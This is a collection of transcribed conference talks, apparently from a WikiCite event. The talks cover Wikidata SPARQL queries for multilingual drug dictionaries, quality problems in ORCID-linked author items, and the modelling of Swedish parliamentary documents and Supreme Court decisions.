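SELECT ?drug ?drugLabel ?drugAltLabel ?drugDescription ?formula ?structure ?article WHERE {
  ?drug wdt:P31 wd:Q12140 .                          # instance of: medication
  OPTIONAL { ?drug wdt:P274 ?formula . }             # chemical formula
  OPTIONAL { ?drug wdt:P117 ?structure . }           # chemical structure (image)
  OPTIONAL { ?article schema:about ?drug ;
                      schema:isPartOf <https://en.wikipedia.org/> . }   # English Wikipedia sitelink
  SERVICE wikibase:label {
    bd:serviceParam wikibase:language "en,es,pt,de,hi,ta,sa,ur" .       # multilingual labels, alt labels, descriptions
  }
}
LIMIT 10

Removing the LIMIT (or raising it) gives the full result set, which can then be downloaded from the SPARQL endpoint as described next.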
Once we get an output, we go to the SPARQL endpoint and download it directly onto a local PC. Once we have downloaded this onto our local machine, we run amidict, which is software that we built, and that converts it into the ami format. The ami format is nothing but a dictionary built with the help of the SPARQL query, which directly helps us to do an ami search and go on to further results. Now I'll show you how things work here. As I said, it's a Wikidata SPARQL query. We are selecting labels for each Wikidata item — Wikidata items are just specific items, which can be anything of your choosing, but here we are using drugs. Each drug has its own alternative names, Wikipedia link and a description. As this goes multilingual, we have added several languages — those are the nine languages which I stated earlier. These are the things we have been running. As I said, we have added the 'instance of medication' property, and the chemical formula and the chemical structure of the compound. We have added the Wikipedia links so the results can be fetched directly. It has nine languages. This code runs to nearly 45 lines. Meanwhile, it is a SPARQL query which takes nearly half a minute or a minute to get its results. You can also limit your searches, depending on your time. You can also see there are 1,570 results, which I think it can fetch within nearly a minute. You can limit your search if you need just 10 drugs, or 10 or 12 results — you can add a LIMIT up here, with your number, which limits your searches. While the results are coming down, let me explain these things. This is something like what you will get in your results, and once you get this, you can find your link; once you click that link, there will be an option called the SPARQL endpoint. Once you open this SPARQL endpoint, you will get the output on your local PC. Make sure that you add proper terms into it, and you can also run the code or check it. Here are the results. You can see here, as I said, the results with the unique identifier, the molecular name, the English Wikipedia links, alternative labels and so on. You can find the identifier multiple times. We can see that for many South Asian languages people have not added terms in their languages, and it is hard to fetch things which have not been added. For this particular drug, we have labels in English, Spanish and German. There are some drugs which have all the languages. This is how the SPARQL endpoint works. For downloading the SPARQL endpoint output, just click it over here — SPARQL endpoint — and it gives you the results. It just takes nearly half a minute to download onto your local PC, and you can then feed it directly into amidict and further explore your dictionary. Thank you. Thank you so much Rajan and Dheeraj. If anybody has questions for either of them, please feel free to leave them on the etherpad. We now have Vaishali to talk about her mini-project, viral epidemics and funders. Over to you Vaishali. Thanks Shweata. Hello, I am a graduate student at the University of Delhi, India. First let me share my screen. Is everything okay, Shweata? Okay, you can go now.
Alright, so I will be talking about the mini-project on active funders in viral epidemics research.
|
We are a globally distributed project, spontaneously created to use semantic knowledge to tackle the viral pandemic. The world's scientific literature, when annotated and aggregated can be analysed with modern data analytics to find new patterns. We have built multiple dictionaries from Wikidata, faceted by scientific and social disciplines (country, disease, drug, funding, virus, etc. and created minicorpora (from EuropePMC and Redalyc) which are searched and annotated locally. The early applications include identification of main subjects within each facet, and occurrence of these subjects. Our dictionaries are multilingual (EN, HI, TA, UR, ES) and we're testing how well they search and annotate non-English sources. Our Open Source material (Apache2, CC BY) can be installed and run by non-specialists. This session will explore the role of global semantic knowledge, and seek collaboration with other parts of Wikimedia.
|
10.5446/51079 (DOI)
|
Hello, welcome back to the author items session at this wiki site conference. So before I introduce Simon, the first speaker today, I just want to remind everyone that this event is covered by the Wikimedia Foundation friendly space policy. So you can see the link at the bottom there if you want to find out more about that, but please just be aware that this is a friendly space, be nice to everyone and follow that policy. Now then, I want to introduce the first speaker, which is Simon Cobb, and I've known Simon now for, gosh, probably going on for five years. He first approached us at the National Library and asked if he could help. He was interested in wiki data and Wikimedia and he wanted to see if he could help out in any way. He went on to become our wiki data visiting scholar, the first position of its type in the world as far as we're aware. And Simon's done some fantastic work, not just with bibliographic data, but all sorts of different collections, sharing them on wiki data, developing the way that those are modelled. And most recently he did a huge amount of work getting over 30,000 books from the National Library of Wales collections onto wiki data and really working hard on author disambiguation and getting all the publishers connected. So I'm really looking forward to hearing Simon's talk, so I will now hand you over to Simon. Hi everyone. So I'm going to talk about author items in wiki data for the next few minutes. As Jason said, I've been doing a lot of work over the last few years with bibliographic data and what I want to do in this presentation is highlight some of the issues that I'm aware of about data quality concerning author items. I want to share knowledge about how we can import more data from ORCID and primarily what I want to do is start a conversation about author items, the data quality and what we want to do with them really. We're just creating a lot of author items at the moment but I don't think we've given sufficient thought to a strategy for how we're doing it and how we're improving and maintaining that data. So that's something that is a theme that runs through this whole presentation. So just to set the scope, this is focusing on author items who have an ORCID ID. We've got about 1.6 million of these in wiki data now. I've done some analysis to prepare my presentation and I also wrote a paper which is available on Commons which I'm effectively presenting now but there are a few differences. I've done some analysis of a 10% sample of these author items and that was done using checksum beginning with 0 and then two following digits or an X from ORCID IDs which I have then compared data from wiki data and ORCID and I'm going to talk about some of the findings of that analysis now. So the first thing I want to talk about is the properties that are used on author items. I've just identified a list of properties which are likely to be found on humans and we might expect people who are actively publishing scholarly articles to have these properties on their wiki data item and it becomes apparent quite quickly that we don't have very much data about these authors. In some cases it's understandable because we don't know that much about them but in other cases it's just the items are sparse because they haven't been worked on. A really good example of this is the names, the family name and the given name of the authors. We have what just over a quarter of the items have a given name, less than 10% have a family name. 
This data seems to me to be readily available, either from publications or from their ORCID. So it seems inexcusable that we've got such low coverage of it in these properties. There are other things that we should really have. I feel quite strongly that we need to have better affiliation data, because it's just so important for any further analysis of author items or their publications. The author acts as a node between a publication and their institution. So if you want to study the research for an institution, you tend to need the affiliation data to be on an author item. This is not a secret. This data can be gleaned from publications or from other databases such as ORCID, which we know is linked to all of these items. So the fact that we've only got a little over a quarter of all of our author items with an employer — well, most of them will be doing work in the context of their employment, so I would argue this should be closer to 100%, although I don't think we can ever achieve completeness, I would say. There are other things like languages spoken and written, or field of work. I would have thought that for researchers we need to focus on improving our coverage of these properties; both appear on less than 1% of the items studied. I just think this is quite low across the board and we really need to work on it. If anyone saw Daniel's presentation about the state of Wikidata earlier, I'm very mindful of what he's saying about avoiding thinking about how big the challenge is. I think that's really shrewd, but I also think we have to keep taking steps to improve what we have and think about where we're going with this, rather than just creating items and hoping they get improved later. So this is quite interesting. It's showing the number of statements on average over time, so as we move from left to right you notice it drops off towards the newer items. Obviously the old items have existed for longer and they've had more time to attract the curatorial efforts of the editor community. But nevertheless, over the last year we've created something like 110,000 new author items just in this sample data, and they have around four and a half statements on average per item, which is really too low. And I should also say that it's not clear from this chart, but the last quarter represents about two thirds of the total number of items, so it's really quite a sizable problem that we're creating very sparse author items and they're not receiving the efforts of editors to improve them for a long time. I think that makes it quite difficult to use them, because people might be interested in doing curation for their institution or subject-based editing, and without sufficient data in the author items you can't really identify a subset to work with. So it becomes a very manual process, unless we can start importing data to improve these items in bulk editing processes. I also want to draw attention to what I think is a nonsensical equation. We've got occupation equals researcher times 1.66 million. I don't think we should be adding that everyone who has an ORCID is a researcher. The screenshot shows my Wikidata item. I can tell you I'm not a researcher, but I do have an ORCID, and that's because I contribute to publications. We have to bear in mind that ORCID isn't just for research — it's Open Researcher and Contributor ID — and we've ended up with a lot of garbage. We don't have occupations that we can query to identify what sort of work people are doing.
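As an illustration of the kind of coverage figures being discussed, here is a minimal SPARQL sketch of my own — not Simon's actual analysis, which was based on a 10% ORCID-checksum sample — counting how many ORCID-holding humans also carry a given name, family name or employer statement. The property IDs are the standard Wikidata ones (ORCID iD P496, given name P735, family name P734, employer P108); on the full set of roughly 1.6 million items a query like this may time out, so in practice you would sample or page through it:

SELECT (COUNT(DISTINCT ?person)        AS ?withOrcid)
       (COUNT(DISTINCT ?hasGivenName)  AS ?withGivenName)
       (COUNT(DISTINCT ?hasFamilyName) AS ?withFamilyName)
       (COUNT(DISTINCT ?hasEmployer)   AS ?withEmployer)
WHERE {
  ?person wdt:P31 wd:Q5 ;       # instance of: human
          wdt:P496 ?orcid .     # ORCID iD
  OPTIONAL { ?person wdt:P735 ?g . BIND(?person AS ?hasGivenName) }
  OPTIONAL { ?person wdt:P734 ?f . BIND(?person AS ?hasFamilyName) }
  OPTIONAL { ?person wdt:P108 ?e . BIND(?person AS ?hasEmployer) }
}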
And if they really were researchers, we could infer that from the ORCID anyway, if that were true. This is just an example of large-scale creation of what I consider pretty useless data. That's a personal opinion and you're very welcome to disagree with it. Let me know what you think. I'd be really curious to know whether anyone thinks that's useful to have. So moving on, this is an example of some incorrect data that's been imported. At a glance you might see quite a number of things that are wrong with it. It's actually the Wikidata item for Anton Bernard that was incorrectly labelled as Differential Society for Pediatric Hematology and Immunology for 10 months after creation. It had that label despite having an ORCID, despite being an instance of a human and having occupation researcher. It's just incompatible to have that label with those properties, and nevertheless it just persisted for 10 months until I noticed it. I did rectify it, but it's quite difficult, because you then have to go back through the publications that are linked to it and start picking out what the actual affiliation is, or whether you need to split the item. It becomes quite time consuming, and I think it's indicative of mass data imports without sufficient validation taking place. I'm regularly editing ORCID iDs that have been imported that aren't consistent with the format regular expression, so they can be incorrect lengths, or they can have completely incompatible formatting for working ORCIDs. I just don't really think this is good enough. I'm hoping this resonates with other people and we can start discussing how to avoid these issues. Obviously there's a lot of data linked from Wikidata by virtue of having ORCID iDs, and we can start importing that data and improving the situation. The problem is when we want to import affiliation data — that's employment or the place of education for the owner of the ORCID profile — we have to first go through a process of reconciliation to match the organisations that are stored in ORCID with Wikidata. This is fine where we've got persistent identifiers that we can use to unambiguously make that connection. However, unfortunately, we don't always have the identifiers in Wikidata, and it's particularly a problem because Ringgold identifiers are so widely used in ORCID, and we have less than half of them in Wikidata: there's something approaching half a million in ORCID and something like 65,000 in Wikidata attached to organisations. Without those connections between the persistent identifier and the Wikidata item, it becomes very difficult to reconcile successfully, because ORCID and Wikidata both use multilingual affiliations and there's a myriad of different name formats you can use for any one organisation anyway. Trying to reconcile using just text is very, very challenging. I haven't discovered a viable way of traversing from a subunit of an organisation to the parent if the subunit doesn't exist. For example, if I was trying to reconcile a faculty which isn't in Wikidata, it's very difficult to then go to the university, which probably is. There are no connections in ORCID, or they're generally lacking in Wikidata, to do that traversal. So you just end up not being able to import that data, and we can't reconcile it. Whereas if you could go to the university and use that for the subunits, you would be able to start adding affiliations and potentially then improve it later.
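A minimal sketch of how one might check the Wikidata side of the Ringgold coverage gap just described — counting how many organisation items carry a Ringgold ID (P3500). This is illustrative only and gives just one half of the comparison; the ORCID-side figure would have to come from ORCID's own data files:

SELECT (COUNT(DISTINCT ?org) AS ?orgsWithRinggold) WHERE {
  ?org wdt:P3500 ?ringgold .    # Ringgold ID
}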
But unfortunately, that doesn't seem to be an option at the moment. I just wanted to comment as well on the distribution of the persistent identifiers that we have in Wicked Data. If we rely solely on what we have already, we're going to be importing a lot of data about a few countries really. We're going to be connecting authors in USA, in Britain and a few other countries in particular. I'm just a little bit concerned this could introduce biases or reinforce biases that we already have. We need to improve this distribution to get better worldwide coverage of affiliation data into Wicked Data. It's going off topic slightly because this will get into a need to curate data around institutions. But that is a prerequisite. I've been able to add affiliation data to authors. Anyway, I think that's enough said about that. I think it's something we should be mindful of. So additional problems which make reconciliation and data imports challenging. In Wicked Data, we've obviously got an incomplete dataset. We don't have all the institutions and their components. Further, we don't have all of the roles that a researcher or anyone working related to research publications could be in. We don't have all the academic ranks. We don't have all the degrees. So these are all things that you can't reconcile and import that data because we don't have it. I don't really know where we go with that. It's a big challenge. But it does limit the amount of data that we can import. We also have some errors in Wicked Data. I think there will always be errors in Wicked Data, but we need to be aware that there are identifiers linked to the wrong institution. For example, if an ISNI is linked to the wrong institution, it can lead to the Ringgold being linked to the wrong institution, which can then cause data imports to be incorrect. So you can end up with a chain of errors that, unless they're addressed, they will just carry on creating more and more errors as we go along. That's obviously a problem. It does get picked up. People every now and again send me a message and say you've done some incorrect data imports. It's great that people do that. If you have, thank you. Not only does it highlight errors in my own work, it enables me to identify what's causing those errors and prevent them from happening again. Another challenge or another conversation, perhaps, is around how we store deprecated identifiers in Wicked Data. So if an identifier is withdrawn or redirected, I think we need to be consistent in how we're handling those so that we can still reconcile against them and import data. The worst thing we can do is just delete them. We need to retain them, but it's probably just need some consensus on whether we're storing them as preferred rank, deprecated rank, or just to know what we're doing, do it consistently. There are also problems in ORCID, which cause challenges when we're trying to import data. The example shown is, I would say, excessively granular. They have eight different entries for one continuous spell of employment at the same institution. If we were to import this to Wicked Data, I don't think we could assign any role that rarely differentiates between them. So there needs to be some sort of consensus around how we handle things like this, whether we just roll all of this up into one, or whether we do want that granularity. I have to admit I've been a bit inconsistent in how I've dealt with this when I've been doing data imports. 
And that is just purely because I don't know what the best way to do this is. So that's really something that I think needs some discussion and we need to put a bit of thought into that. There are also errors in ORCID that someone recently highlighted. This one, to me, they said, when I got a message there in a batch of my imported data was wrong, it turned out that it's because the ring gold hold for the University of San Paolo in ORCID. In this ORCID is incorrect, so it ends up causing reconciliation to the wrong institution which causes data to be imported incorrectly. It's not a big problem that I'm aware of in ORCID, but it does happen. It's just, again, something to be mindful of. Okay, and the final one that I wanted to highlight is in the education record where people are compressing two degrees into one entry. It's very challenging to work with because you need to decide whether you're going to try and split that out or you're going to try and split it, reconcile two degrees and import it or just quite a few different ways that you could handle this. Usually it just ends up being things that don't get imported at the moment because there's a lot more low hanging fruit to take, so why work on the difficult stuff when there's easier things, it's been my thinking. But at some point we are going to need to tackle this if we want to import this data. So I'm suggesting a few next steps of where we might go with this. Again, this is really to try and start a conversation. I'm not saying we have to do it this way. If you disagree, the best thing to do is say so because that will contribute to the conversation and we can reach some sort of consensus. I think we really need to consider what is the minimal acceptable standard for author item data. I really question whether some of the imports that are happening on mass at the moment are creating data that's good enough quality and whether with small improvements we could make quite a big improvement to data quality. Sorry, that small improvements to the import methodology could make quite big improvements to the data quality. I think to help decide whether the standard is good enough, we need to define requirements for different use cases. What are we actually doing with author items? Are we just creating them because we can? Are we creating them just as a node to link different publications? Or do we want to do other things with them as well? When we know that we can start looking at what data is needed for those different use cases. Some of the other things are just relating to persistent identifiers. I won't go into those in detail. I'm currently going through a process of validating my own data imports and trying to identify problems. It's very difficult to do that because I haven't stored in the references to put code from orchids so we have to import the entire set of employment or education summaries rather than being able to link directly to a specific summary. Which leads to, I think there's a need to start storing the put codes in references in wiki data when we're importing data from orchids so we can validate it in the future, check for updates, etc. What I really want to do, kind of my motivation behind organizing this whole session, is to work towards setting up an online workshop so we can actually have discussions and we can work out how to collaborate around author items. 
I know there are other people who are working on improving data quality, but we're all quite disjointed, so it would be really good to get interested people together, have a conversation and think about how we can work collaboratively for the overall good of improving data quality. So that's a summary of what I'm thinking and what I've been working on, and I'm happy to take any questions; I'm very interested in other people's comments on this topic as well. Brilliant, thank you very much for that, Simon, that was really interesting, and yes, we do have a few minutes for questions. There are some in the Etherpad already, but if you have any others you want to ask, just pop those in as soon as possible and I'll put them to Simon. So the first question we've got for Simon is: is it possible to do a mix and match between ORCID and VIAF? Well, Mix'n'match is a tool for importing data to Wikidata, so not directly, I don't think; you'd have to import data about one to Wikidata and then import the other based on Wikidata, so probably yes. I guess Wikidata is kind of a mix and match in a way, isn't it? Yeah, it is, but not as easy as it's made to sound. Cool, there's a comment question. Someone's a bit worried that Wikidata items with ORCID iDs might be linked to the wrong people, or incorrectly listed as an author on an item about an article, for example. So do you come across these kinds of errors? What are your thoughts on this? Yeah, I mean, I highlighted one in the presentation which was a glaring error, where it was clearly an organisation that had been created, and I believe that happened because the wrong author in a list of authors on a publication was scraped, imported and associated with the ORCID iD. So yes, it does happen. I think there's a serious need for data validation across all the scholarly articles and these mass data imports that haven't been touched by human editors, because yes, there will be errors, it's inevitable, but I have no idea how big a problem that would be. Okay, thank you. The next question is: do you have any thoughts on using DBLP as a preferred identifier with a fallback to ORCID? Does that make sense? Yeah, it does make sense. I don't know why you'd use it as a preferred identifier; I'd use it as an extra identifier on top of ORCID, and probably fall back to DBLP rather than the other way round, but that's a personal preference, I suppose. Just to elaborate on that slightly: because ORCID is curated by the author, it's an unusually reliable source, although obviously there are times when that could be a problem, but in general it's probably the best source of data we have for author items, and then afterwards we should start looking at other sources where ORCID isn't helpful. Fantastic. I think that's about it for questions. Apologies if you have posted a question somewhere and we haven't seen it, but I'm sure Simon will be happy to take questions on Telegram or anywhere else during the afternoon. Yeah, very much so. We've got a break later on, so if any questions emerge you can ask them then, or general questions can come up during the afternoon; or if you think of a question later, just send me a message on Wikidata. I'm on there all the time, so you'll get a reply quite quickly.
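On the ORCID and VIAF question, a query along these lines (P496 is ORCID iD and P214 is VIAF ID; the query itself is only an illustration) would list items that already have one identifier but not the other, which is roughly the "import one based on the other" route described in the answer:

    # Author items with an ORCID iD but no VIAF ID: candidates for matching against VIAF.
    ORCID_WITHOUT_VIAF = """
    SELECT ?item ?orcid WHERE {
      ?item wdt:P496 ?orcid .                      # ORCID iD
      FILTER NOT EXISTS { ?item wdt:P214 ?viaf . } # no VIAF ID yet
    }
    LIMIT 500
    """
    # Run at https://query.wikidata.org/ or with any SPARQL client; the results could
    # then be fed into Mix'n'match or matched by another script.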
|
Data quality, disambiguation, profiles, persistent identifiers, etc.
|
10.5446/51091 (DOI)
|
Hello and welcome to this wiki site session. We're going to talk Swedish Parliament and New Digital documents and their use. And your host tonight is me, Jan Einle and Daniel Ekshaw. Hello. How are you doing Daniel? Very well thanks. It's a wonderful rainy evening here in Stockholm. We had a pleasant day here. A little bit first of an autumn day here in Amsterdam. So what we're going to talk about today is quite of a long project, but we're still just in the midst of it, I would say. We have so much ideas, but it's about this golden treasure of the open data portal of the Swedish riksdag, the Parliament of Sweden. But before we go into the depth of that, we want to give you a little bit of introduction to how we got started. And before we go into depth, I want to give you some housekeeping things. So everything today, we have the WMF the Wikimedia Foundation Friendly Space Policy that we're here to. So please be friendly to watch each other in the chats. And we have the chats activated here both on YouTube and on Periscope and we're also streaming this to the Swedish Wikipedia group, Facebook group. So you can all comment there and we will see it and can bring it up. And we have already had like a friendly hi-all from FIWI here. So please ask us questions during this entire session because I think there are things that you might want to know more of that we have so internalized to even bring it up because we have been thinking and talking about this a lot. Yeah, there might be a lot of special peculiarities with how the Swedish system works that we don't quite think about but not everyone knows. Yeah, and we have learned a lot about the Swedish peculiar system when we have digging into this. And I think that's almost like it's everything when you go into the Wikidata and think, ah, I know this topic, I can model this. And then of course you see, ah, no, it's much more complicated in reality. And what else do we have? So you can comment directly where you're watching, but if you rather want to, you can also comment in the Telegram group for Wikisite. And yeah, that's about it. So let's dive into the introduction of Swedish project. I'm going to share my screen here. This is the share screen. So Wikiproject Sweden. I guess most of you people know about Wikiprojects in general. And Wikisite is of course kind of a Wikiproject. But we, when we started here, it turned out that there were already a lot of things done in regards to Wikidata and Sweden. And I guess most of the countries have this kind of properties country box where you can see the properties that are available to you when it's related to your country. And that's sort of where we started. But when we started to get into the nitty-gritty of things, we saw that there were already things being done before we even got here. So one of the first thing is this sub-project from the Wikiproject EveryPolitician which is of course a much larger project that started years ago and which had much larger scope like trying to get every politician onto Wikidata and see if it loads here. Yes. And we have this little bit of tracker here and I think we have just gotten up to two stars here on Sweden during this because one of the first things we wanted to do before actually going anywhere was to get all the parliamentarians into this. And we're going to meet some of the people who have been in that process as well. 
And the most complicated things about that was that most of the politicians already had an article on Swedish Wikipedia but their Wikidata items weren't very good at all. So we had to improve them and that was tough because since they had some data it was hard to run a bot because it's easier if there's no data you can just add in everything. So we did a lot of work by hand to get that up and running. How did you solve it? I think we may have just lost the article. I think I just exited the stream there. Good to have you back. I was trying to ask what you would do to solve it, maybe that's going a bit or too fast into what we were going to talk about later. How did you solve the problem of disambigrating or not adding duplicate politician? No, I think that's a great question to start with because that's what you run into in the beginning. Luckily in the Swedish open data set there's an identifier for the parliamentarians which has been of great help to actually point like this is exactly this one because of course you have a few parliamentarians with the common Swedish names so you can have three or four with the same name but they've been there over the years. That helped us a lot to get started. Let's see if I can get back to share my screen here again. This is where we were. Yes. That's where we got started and this actually started last year about this time. I thought I can do this by hand and be done by Christmas. It took a little bit of a longer time than that but eventually we got it done. Then it was easier to backfill with the rest and then when we had the politicians there it also seemed easier to start adding more things to it and that's where we actually got into starting a Wiki project. Of course we weren't the first trying to do a Wiki project in our country so we copied proudly the design from Wiki Project India and just customized it with our colors and made a logo for ourselves and that's in our background here. Then we started with some plans and ambitions like what we want to do with this project and how can we collaborate and a few people joined and we actually started a telegram group just so that we could chat in Swedish and not spam the general Wiki data group with all our nitty gritty details because there are always a lot of nitty gritty details. Then when we had something like oh this is a larger question that relates to more countries or all the countries then we bring it up to the general Wiki data group or going on Wiki and having a discussion or going to a property talk page. I think having a place to shout out ideas or questions in a more live fashion almost or having fast real-time answers is very helpful when you're stuck on something and you need advice so it's been a very good catalyst I think for getting some of this work done that we're going to talk about today. Yeah. I'm going to mark a few of these. These projects were already related to Sweden and existed before we started this project. So there have been sub projects in specific topics. Some of them quite large because the Wiki loves monuments that includes like 150,000 monuments so that's quite a big one. They're working on my PC right? Yeah. But this one now we could actually join forces. Everyone who had some sort of common thing about Sweden to some interest. And these are the two things that we're going to talk about today. We're going to talk about the Riksdag documents and the court decisions. And of course here are all the things we have. 
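On the duplicate question discussed above, the usual guard is to look the external identifier up before creating anything. Here is a minimal sketch using the CirrusSearch haswbstatement keyword on the Wikidata API; I am assuming that P1214 is the Riksdagen person-ID property, and the identifier value is made up, so check both before relying on this:

    import requests

    def items_with_external_id(prop, value):
        """Return Wikidata item IDs that already carry prop = value (empty list if none)."""
        params = {
            "action": "query",
            "list": "search",
            "srsearch": f"haswbstatement:{prop}={value}",
            "format": "json",
        }
        resp = requests.get("https://www.wikidata.org/w/api.php", params=params)
        resp.raise_for_status()
        return [hit["title"] for hit in resp.json()["query"]["search"]]

    # Before creating an item for a parliamentarian, check their Riksdag identifier first.
    existing = items_with_external_id("P1214", "0123456789012")   # placeholder identifier value
    if existing:
        print("Add statements to the existing item:", existing[0])
    else:
        print("No match found, safe to create a new item")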
Do you have anything thoughts in general Daniel on how this over viewing project has helped us? So I think I mean it's had it's been a place to sort of showcase I guess what is happening around Sweden related topics in general and to bring together this first group of projects that have some kind of relationship to Sweden that were a little bit overall on Wiki data. And I think it is mainly I think it's working as a showcase where people can get ideas for oh someone has done this already but what if I were to do something similar but with this other data set or without this other group of objects. Yeah. And then of course we have had this project page to talk on. We have had this telegram group in Swedish which makes it very easy for us because as you can hear we're not native English speakers. This is our second language. So as soon as we go into details especially when you go into details about the parliamentarian processes like it's tricky even for a swede knowing the difference of the like inquiry reports and other kinds of documents and what they actually are. So following back into your native language has helped me a lot. Yeah. I mean we try to keep the discussions on Wiki in English to I guess to share our thoughts and ideas with other people who might be interested in seeing them but having a place of Wiki where we can discuss that in in our native language has definitely helped. Yeah. And of course doing it on English on Wiki has also helped because we have had gotten a lot of help from other people discussing how we should use different kind of properties. I think one of the biggest thing was that after getting all our parliamentarians on there the way we connected them and their offices to the party they represented we used the wrong property for that in the beginning. So we used the member of party where we should use the parliamentary group and the nuances in the labels in Swedish made it really unintuitive for a swede to know this is not applicable to us and then after discussing like no but every other country using it in that way. So perhaps we should just change the label in Swedish to make you understand and of course that makes querying a lot easier afterwards and I think we will get back to that a little bit later how that is of course a factor in everything. So just quickly going through this project before we move on into the other things. Yes. So what I was going to say besides the the telegram group and being on Wiki we are also doing online editathons but not really editathons we have more like having online meetings to discuss because we haven't edited much have we Daniel? It's been very little editing. Yeah. But we meet like having a steady time each week just sitting down and chatting a little bit well like what happened and what our ideas sometimes that unlocks so much of the things that are hard to express in words especially when you come into the complex things of qualifiers and modelling. I think also even if the chat is great I think talking well not face to face but at least on a video meeting that you can maybe faster iterate or come up with new ideas faster in that setting. Yeah. So let's head into our first topic of today which is is it the core decisions we're starting with? I believe so. Yes. Do you want to share the screen? Yeah I think that might be a good idea perhaps I can give some introduction just to what it is even without sharing the screen. So why would you want to do this? Why would you want to put core decisions on wiki data? 
Sweden is a bit different from some countries that well the one that I know mostly perhaps is the US which you hear a lot about in the news because the Supreme Court in the US is rather powerful and important. The Swedish Supreme Court is maybe a bit more anonymous but it's still quite important and in recent years I think taken a bit more of a or using its power and actually accepting precedent where before they maybe would not want to step in where the law is unclear or ambiguous now they actually step in and say this is what we believe the law should be and if the legislative branch is not happy with that they will have to change the law. So they are a little bit changed the way they do things and it's kind of interesting to be able to look at some of those patterns. And of course what I looked at was as well the US so on Wikipedia pretty much every Supreme Court case I think in the US has a Wikipedia page already. Everything is modeled great in wiki data perhaps and some of them that are modeled out. So I'll show you one of my or one of the more famous perhaps US Supreme Court cases. You already put my... Yes, so this is quite a famous case right, the Citizens United versus Federal Election Commission which is I think about probably some American is going to tell me I'm wrong here but I think it's about how companies can finance campaigns in elections and specifically it said that corporations do have the right to free speech and financing a campaign in elections is free speech according to US law or the US Supreme Court anyway. So that's kind of what this case said in a nutshell. And if we go through quickly what it is I think I should change this to help people. Yeah, help our viewers perhaps. Indeed. Of course it's got an instance of a Supreme Court decision for some reason there are two instances out here. Maybe someone should look into that. What is the difference between a Supreme Court case and a Supreme Court decision? I'm not sure. So it has a country and a jurisdiction, it has a publication date obviously, it has some significant events that are all the oral arguments and the decision dates. It's got a citation and this is how you would if you write a text about this decision how would you refer to it? So this is getting into the interesting stuff for WikiCite. And there are often for legal texts and court decisions there are ways to refer that are rather standardized and in the case of the US Supreme Court there are a number of ways you can refer to a court case depending on which publisher you are using for your... I think there are duplicates from that. Probably, yeah. No, they're different, there's a space in between there. Is there a space? Ah, okay, maybe I should not. Would you leave that to someone else who knows better than I do? So it has a court, right? And then it's published in the US United States reports. It's got even a commons category, it's quite a famous decision. It's got a majority opinion that was written by Anthony Kennedy here. Alright, that also has a reference there. Indeed. And then there are a few other identifiers on the page in Wiki. There's also quite a lot if someone is curious. There's also quite a lot of other information on the Wikipedia page that you could actually bring in and insight on there. For example, there are a lot of opinions on this that we're going to talk about a bit later. How we actually modeled the opinions. Yeah, I think Phoebe or once had us here. Yeah. Indeed. Indeed. So that was a US example. 
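As a small aside on how a model like the one just walked through can be queried once it is in place, something like the following lists decisions of a given class in date order; the class Q-id is a placeholder for whichever "Supreme Court decision" item is used, so substitute the real one:

    # Decisions of one court, newest first. Q0000000 is a placeholder class item.
    DECISIONS_BY_DATE = """
    SELECT ?decision ?decisionLabel ?date WHERE {
      ?decision wdt:P31 wd:Q0000000 ;   # instance of: Supreme Court decision (placeholder)
                wdt:P577 ?date .        # publication date
      SERVICE wikibase:label { bd:serviceParam wikibase:language "en". }
    }
    ORDER BY DESC(?date)
    LIMIT 50
    """
    # Paste into https://query.wikidata.org/ or run with any SPARQL client.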
And so I looked at that and stole quite a lot of the modeling. I guess there's one more thing that is actually showcased on this item, which is how you model the different opinions. Yeah. Then I went to sort of, okay, what can we do for Sweden here? So what is the data source for this? Well, there is, of course, there is the Supreme Court website and this is all in Swedish, but we, let's open up one and look at it. Anyway, I think I'm going to search for one that is from last year. It's because it makes life a bit easier to show something. So these are all the different decisions, right? We can pick one that is a funny name perhaps. Trying to see if it has something interesting, but maybe not. We'll be about to leaking roof. The leaking roof. All right. Sounds very interesting. So this was a question about the responsibility for correcting a problem in an apartment where there wasn't damage posed to the apartment and to another part of the house. So who was responsible for paying well? So typically, you know, litigation around who pays what and probably some insurance companies involved here. So this is the sort of website that I had to work with when it comes to sources. And this is the website and then you have a link to the PDF which contains the pool written decision. And of course for 2019 and I think a few years back you have a little bit of actual data here on the side which helps. There's the law supply, there is a name that is given by the court to the case, there is a case number and there's a few keywords that are sort of helpful. So one of the first things that it was just to sort of scrape this website and scrape the name and this is what we talked about the legal citation. So this is how you would refer to this case in Swedish legal text. But I'm pretty soon this, I realize that this information is not that great. So we actually have to go and look at the final case. Now you're not sharing that view. You have to share again. Okay. Of course. So here it goes. So here's the written case then. And it's got some interesting information here. So one of the things that I really wanted to get at was this actually down here. At the very bottom. It says in this decision have been taken part the justices and the justice and the judges. So these are the judges that took part in this decision. This is a bit of a Swedish court perhaps. Not like in the US where the whole court always decides in the full chamber of nine justices in Sweden. There are typically five justices that decide one case. And the court has decided court has 16 or so justices that they are specialized in two different department departments. One about criminal cases and one about civil cases. They tend to only decide decisions in those, in the cases within their area except for a few very special decision where they overturn a part of previous precedent where they would actually have a full chamber of all the 16 justices that decided together. And then there's another peculiar thing here which is the, it's called referent in Swedish or maybe a reporter or a reporter or reporting judge in English which is the justice that is in charge of that case. So that's also something we wanted to record. And then try to make it more a little bit faster this time. So if we go back then to actually look at this case we can search for it. So the name is the available on Wikipedia. Search for it's name of the item of course. 
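A rough sketch of the first scraping step described here, collecting case names, case numbers and PDF links from the court's listing page; the URL and the HTML selectors are placeholders, since the real page structure has to be inspected, and this assumes requests and BeautifulSoup:

    import requests
    from bs4 import BeautifulSoup   # beautifulsoup4

    LISTING_URL = "https://www.example.se/avgoranden?year=2019"   # placeholder URL

    def scrape_decision_list(url):
        """Yield (case name, case number, pdf link) tuples from a listing page."""
        soup = BeautifulSoup(requests.get(url).text, "html.parser")
        for entry in soup.select(".decision"):                     # placeholder selector
            yield (
                entry.select_one(".name").get_text(strip=True),    # title given by the court
                entry.select_one(".case-number").get_text(strip=True),
                entry.select_one("a[href$='.pdf']")["href"],       # link to the full written decision
            )

    for name, number, pdf in scrape_decision_list(LISTING_URL):
        print(number, name, pdf)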
